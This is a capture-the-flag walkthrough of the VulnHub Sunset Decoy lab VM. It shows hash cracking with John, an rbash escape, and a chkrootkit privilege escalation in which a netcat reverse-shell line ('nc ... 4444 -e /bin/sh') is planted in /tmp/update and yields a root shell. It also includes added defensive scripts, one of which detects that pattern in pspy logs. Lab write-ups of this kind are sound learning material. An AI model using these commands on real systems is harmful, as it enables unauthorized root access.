VulnHub Sunset Decoy Walkthrough – Cracking with John

The next VM that I completed on stream was VulnHub Sunset Decoy.

VulnHub Sunset Decoy Walkthrough - Introduction

To continue with my VulnHub solves, I moved on to the Sunset Decoy VM, my first foray into whitecr0wz's VM series.

You can find the VM here, and it was easy.

VulnHub Sunset Decoy - Login

Enumeration

First, I swept my entire network and found the IP address of my target box.

Nmap scan report for 192.168.5.227
Host is up (0.00049s latency).
MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)

Next, I scanned the target for open ports and found that 22 and 80 were listening.

kali@kali:~/VulnHub/decoy$ sudo nmap -A 192.168.5.227
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 20:21 EDT
Nmap scan report for 192.168.5.227
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/24%OT=22%CT=1%CU=30997%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F6D3818%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.5.227

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.74 seconds

When I visited the target on port 80, the server prompted me to download a zip archive.

kali@kali:~/VulnHub/decoy$ mv ~/Downloads/save.zip .
kali@kali:~/VulnHub/decoy$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
kali@kali:~/VulnHub/decoy$ ls
save.zip

Password Cracking

First, with the archive downloaded, I extracted the zip hash using zip2john and saved it to hash.txt for John.

kali@kali:~/VulnHub/decoy$ sudo zip2john save.zip
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
save.zip:$pkzip2$3*2*1*0*8*24*a1f8*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*b3ac*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*d9c3*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip2$::save.zip:etc/hostname, etc/group, etc/passwd:save.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

Next, using John, I cracked the encrypted archive's password: "manuel".

kali@kali:~/VulnHub/decoy$ sudo john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
manuel           (save.zip)
1g 0:00:00:00 DONE 2/3 (2020-09-24 20:26) 9.090g/s 658445p/s 658445c/s 658445C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed

When I extracted the zip archive, I obtained a few files from the target's /etc folder.

kali@kali:~/VulnHub/decoy$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
  inflating: etc/passwd              
  inflating: etc/shadow              
  inflating: etc/group               
  inflating: etc/sudoers             
  inflating: etc/hosts               
extracting: etc/hostname

The group file contained a group name that looked like an MD5 hash, but this seemed to lead nowhere.

kali@kali:~/VulnHub/decoy/etc$ tail -1 group
296640a3b825115a47b68fc44501c828:x:1000:

This same hash was also a username on the box, and that user's login shell was rbash, a restricted shell.

kali@kali:~/VulnHub/decoy/etc$ tail -1 passwd
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash

When I looked at the shadow file, I found two potential user hashes to crack; the other accounts were locked.

root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::

... <snip> ...

colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
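The same triage done by hand above (which shadow entries are actually crackable, and which of those users land in a restricted shell), as an added example that is not part of the original post. The sample data is constructed for the example, apart from the two $6$ hashes, which are the ones shown above.

```python
# Triage of the /etc/shadow and /etc/passwd copies pulled from save.zip:
# which accounts carry a real password hash (and which scheme), and which
# log in to a restricted shell.  Sample data is constructed for this
# example; the two $6$ hashes are the ones shown in the post.
import re

# crypt(3) identifier -> scheme name; John calls "$6$" sha512crypt.
CRYPT_SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
HEX32 = re.compile(r"^[0-9a-f]{32}$")      # usernames that look like an MD5 digest
RESTRICTED_SHELLS = {"/bin/rbash", "/usr/bin/rbash"}

SHADOW_SAMPLE = """\
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
"""

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
"""


def crackable_hashes(shadow_text):
    """Return {user: scheme} for shadow entries that hold a real hash.
    '*' or a leading '!' means the account is locked, so there is nothing
    to crack; an empty field means the account has no password at all."""
    found = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        if field == "*" or field.startswith("!"):
            continue
        if field == "":
            found[user] = "empty-password"
            continue
        m = re.match(r"^\$([^$]+)\$", field)
        found[user] = CRYPT_SCHEMES.get(m.group(1), "unknown") if m else "descrypt"
    return found


def triage(shadow_text, passwd_text):
    """One row per crackable account:
    (user, scheme, shell, restricted_shell, name_looks_like_md5)."""
    shells = {}
    for line in passwd_text.splitlines():
        if line.strip():
            fields = line.split(":")
            shells[fields[0]] = fields[-1]
    rows = []
    for user, scheme in crackable_hashes(shadow_text).items():
        shell = shells.get(user, "?")
        rows.append((user, scheme, shell, shell in RESTRICTED_SHELLS,
                     bool(HEX32.match(user))))
    return rows
```

Running `triage(SHADOW_SAMPLE, PASSWD_SAMPLE)` on the sample returns only the two sha512crypt accounts, with the hex-named one flagged as restricted-shell.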

Again using John, I cracked the hash for the '296640a3b825115a47b68fc44501c828' user: its password was "server".

kali@kali:~/VulnHub/decoy$ sudo john user-hashes.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
server           (296640a3b825115a47b68fc44501c828)

Initial Foothold

With the cracked password, I SSHed into the box and had my initial foothold.

kali@kali:~/VulnHub/decoy$ ssh 296640a3b825115a47b68fc44501c828@192.168.5.227
The authenticity of host '192.168.5.227 (192.168.5.227)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.227' (ECDSA) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.5.227's password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

Just like the Funbox solve, I had to escape my rbash environment, which I did by asking SSH to run an unrestricted bash instead of the login shell.

kali@kali:~/VulnHub/decoy$ ssh 296640a3b825115a47b68fc44501c828@192.168.5.227 -t "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.5.227's password:
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
bash: cat: command not found

When I used the full path to the binary, I was able to obtain the user flag!

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /usr/bin/cat user.txt
35253d886842075b2c6390f35946e41f

Finally, I found a honeypot.decoy binary that appeared to be a fake administrative console for a honeypot on the target system.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:1

Thu 24 Sep 2020 08:35:40 PM EDT
--------------------------------------------------

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:3

Shutdown is currently not available due to not enough privileges. Ending program.
--------------------------------------------------

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:8

/usr/sbin/service: 1: /usr/sbin/service: basename: not found
/usr/sbin/service: 1: /usr/sbin/service: basename: not found
/usr/sbin/service: 169: /usr/sbin/service: systemctl: not found
/usr/sbin/service: 175: exec: systemctl: not found
--------------------------------------------------

Privilege Escalation

While looking around the user's home directory, I also found saved output from a pspy run.

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0    PID=9      |
2020/06/27 18:56:57 CMD: UID=0    PID=8      |
2020/06/27 18:56:57 CMD: UID=1000 PID=7659   | /bin/bash
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7657   | /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080

... <snip> ...

2020/06/27 18:56:57 CMD: UID=0    PID=104    |
2020/06/27 18:56:57 CMD: UID=0    PID=102    |
2020/06/27 18:56:57 CMD: UID=0    PID=10     |
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash
2020/06/27 18:57:04 CMD: UID=0    PID=12390  | -bash
2020/06/27 18:57:04 CMD: UID=0    PID=12391  | -bash
2020/06/27 18:57:05 CMD: UID=0    PID=12392  | -bash
2020/06/27 18:57:05 CMD: UID=0    PID=12393  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12394  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12395  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12396  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12397  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12398  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12399  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12400  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12401  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash
Exiting program... (interrupt)

Wondering if the chkrootkit binary was being run by the honeypot, I selected the "AV Scan" option again.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

As expected, the chkrootkit binary was being run as root when the AV option was selected.

root      4932  0.0  0.0   2388   756 ?        Ss   20:41   0:00 /bin/sh -c /bin/bash /root/scrip
root      4933  0.0  0.3   6644  3064 ?        S    20:41   0:00 /bin/bash /root/script.sh
root      4934  3.0  0.1   2676  1936 ?        S    20:41   0:00 /bin/sh /root/chkrootkit-0.49/ch
296640a+  5307  0.0  0.3  10632  3120 pts/0    R+   20:41   0:00 /usr/bin/ps aux

After a bit of research, I found a potential chkrootkit exploit for privilege escalation.

Before going any further, I tested the nc binary to make sure that a reverse connection could be made.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ /usr/bin/nc 192.168.5.228 4444 -e /bin/sh
^C

My attacker machine caught the shell, so I knew that I'd be able to proceed further.

listening on [any] 4444 ...
192.168.5.227: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54192
id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

Following the exploit steps, I created a malicious update file in /tmp.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo '/usr/bin/nc 192.168.5.228 4444 -e /bin/sh' > /tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ /usr/bin/chmod +x /tmp/update

When I executed the AV scan, my attacker machine got a connection from the target, and I had a root shell!

kali@kali:~/VulnHub/decoy$ nc -lvp 4444
listening on [any] 4444 ...
192.168.5.227: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54194
id
uid=0(root) gid=0(root) groups=0(root)

When I looked at script.sh, it ran the chkrootkit binary as expected and mentioned the AV scan.

cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi
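From the monitoring side, the pspy output found earlier is exactly the data a defender would watch for this chain. The detection pass below is an added example, not part of the original post: it parses pspy CMD lines (the format shown above is assumed) and flags root commands that execute something from a world-writable directory or spawn netcat with -e. The first four sample lines are taken from the post's pspy output; the last four are constructed to show what the /tmp/update trick looks like in that log.

```python
# Detection pass over pspy-style process logs like the one found in the
# user's home directory: flag root (UID=0) commands that execute anything
# from a world-writable directory, or that run netcat with -e.
# Added example, not part of the original post.  The first four sample
# lines are from the post; the last four are constructed.
import re

PSPY_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\| ?(?P<cmd>.*)$")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
NETCAT = re.compile(r"(^|/)(nc|ncat|netcat)$")

SAMPLE_LOG = """\
2020/06/27 18:56:57 CMD: UID=0    PID=9      |
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash
2020/06/27 20:41:00 CMD: UID=0    PID=4933   | /bin/bash /root/script.sh
2020/06/27 20:41:00 CMD: UID=0    PID=4934   | /bin/sh /root/chkrootkit-0.49/chkrootkit
2020/06/27 20:41:01 CMD: UID=0    PID=4940   | /bin/sh /tmp/update
2020/06/27 20:41:01 CMD: UID=0    PID=4941   | /usr/bin/nc 192.168.5.228 4444 -e /bin/sh
"""


def parse_pspy(text):
    """Turn pspy CMD lines into dicts; banner and config lines do not match and are skipped."""
    events = []
    for line in text.splitlines():
        m = PSPY_LINE.match(line)
        if m:
            events.append({"ts": m["ts"], "uid": int(m["uid"]),
                           "pid": int(m["pid"]), "cmd": m["cmd"].strip()})
    return events


def suspicious_root_events(events):
    """Return [(pid, cmd, [reasons])] for root commands worth an alert.
    The chkrootkit run itself is legitimate; what should never happen is root
    executing a file under /tmp, or root spawning netcat with -e."""
    hits = []
    for e in events:
        if e["uid"] != 0 or not e["cmd"]:
            continue
        argv = e["cmd"].split()
        reasons = []
        if any(arg.startswith(WRITABLE_DIRS) for arg in argv):
            reasons.append("root executes a path under a world-writable directory")
        if NETCAT.search(argv[0]) and "-e" in argv:
            reasons.append("root runs netcat with -e (shell attached to a socket)")
        if reasons:
            hits.append((e["pid"], e["cmd"], reasons))
    return hits
```

On the sample, only PIDs 4940 and 4941 are reported; the legitimate /root/script.sh and chkrootkit runs stay quiet.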

Finally, I grabbed the root flag, and completed the VM!

cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
/     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Video Highlight

If you'd rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Sunset Decoy Walkthrough - Conclusion

This was my first VM by whitecr0wz, and it was a fun one.

I still plan on making a ton of posts but let me know if these VulnHub write-ups get repetitive.

Other than that, let me know if you have any ideas for what else I should stream!

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

